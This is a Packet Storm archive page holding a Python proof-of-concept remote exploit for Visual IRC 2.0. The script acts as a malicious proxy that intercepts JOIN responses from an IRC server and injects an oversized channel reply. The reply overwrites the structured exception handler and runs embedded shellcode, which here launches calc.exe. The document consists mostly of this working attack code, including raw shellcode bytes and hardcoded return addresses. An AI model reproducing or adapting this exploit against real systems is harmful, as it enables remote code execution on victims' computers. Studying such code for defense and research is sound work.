what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

virc-oday.txt

virc-oday.txt
Posted Jul 7, 2007
Authored by Krystian Kloskowski

ViRC version 2.0 JOIN response remote SEH overwrite exploit. Tested on Visual IRC 2.0 / 2k SP4 Polish. Executes calc.exe.

tags | exploit, remote
SHA-256 | c6782288f12a3ccf5a191e0a8e8953d94108243ace96aad60878b3fe1aadaddc

virc-oday.txt

Change Mirror Download
#!/usr/bin/python
# ViRC 2.0 'JOIN Response' 0day Remote SEH Overwrite PoC Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on Visual IRC 2.0 / 2k SP4 Polish
# Shellcode type: Windows Execute Command (calc.exe)
# How stuff works ? ..
#
# [ViRC] -----> (..JOIN..) -------------> [exploit_tunnel] -----------------------------> [Real IRC server]
# [ViRC] <--- (#channel :AAAAAAA...) <--- [exploit_tunnel] <---- (#channel :nick) <------ [Real IRC server]
#
# Details:
# "#channel :" + "A" * 4116
# 0x41414141 Pointer to next SEH record
# 0x41414141 SE handler
##

from thread import start_new_thread
from struct import pack
from string import find
from string import join
from socket import *

LEN_RECV = 65536

in_addr = '0.0.0.0' # local address
in_port = 6667 # local port
out_addr = '192.168.0.2' # address of IRC server
out_port = 6667 # port of IRC server

shellcode = (
"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"
"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"
"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"
"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4")

NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06
SE_HANDLER = 0x7CEA41D3 # POP POP RET (SHELL32.DLL / 2k SP4 Polish)

buf = "A" * 4108
buf += pack("<L", NEXT_SEH_RECORD)
buf += pack("<L", SE_HANDLER)
buf += "\x90" * 32
buf += shellcode

class new_plug_in:
def __init__(self):
self.sock = 0
self.send_to = 1
self.active = 1
self.plugins = []
self.description = ''

def CloseTunnel(self):
if(self.active == 1):
self.active = 0
self.sock.shutdown(1)
self.sock.close()
self.plugins[self.send_to].active = 0
self.plugins[self.send_to].sock.shutdown(1)
self.plugins[self.send_to].sock.close()

def Send(self, data):
try:
self.sock.send(data)
except:
self.CloseTunnel()

def Recv(self):
while(1):
try:
data = self.sock.recv(LEN_RECV)
if(len(data) == 0):
self.CloseTunnel()
return
print self.description
print data
if(self.description == '[SERVER]'):
if(find(data, 'JOIN') != -1):
data = build_evil_buf(data, buf)
if(data == -1):
print "Error: Malformed IRC response"
self.CloseTunnel()
self.plugins[self.send_to].Send(data)
except:
self.CloseTunnel()
return

def Run(self):
if(len(self.plugins) == 0):
self.plugins.append(self)
try:
s = socket(AF_INET, SOCK_STREAM)
s.connect((out_addr, out_port))
except:
s.close()
self.sock.close()
return
tunnel_out = new_plug_in()
tunnel_out.sock = s
tunnel_out.send_to = 0
self.plugins.append(tunnel_out)
self.description = '[CLIENT]'
tunnel_out.description = '[SERVER]'
tunnel_out.plugins = self.plugins
tunnel_out.Run()
start_new_thread(self.Recv, ())

def build_evil_buf(data, buf):
try:
lines = data.split('\r\n')
tmp = lines[1].split('\x20:')
tmp[1] = buf
lines[1] = join(tmp, "\x20:")
return join(lines, "\r\n")
except:
return -1

def AcceptConnect(cl, addr):
print "Connection accepted from: %s" % (addr[0])
tunnel_in = new_plug_in()
tunnel_in.sock = cl
tunnel_in.Run()

def InitServer(bind_addr, bind_port):
s = socket(AF_INET, SOCK_STREAM)
s.bind((bind_addr, bind_port))
print "Listening on %s:%d..." % (bind_addr, bind_port)
s.listen(1)
while(1):
cl, addr = s.accept()
start_new_thread(AcceptConnect, (cl, addr,))
s.close()

InitServer(in_addr, in_port)

# EoF

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close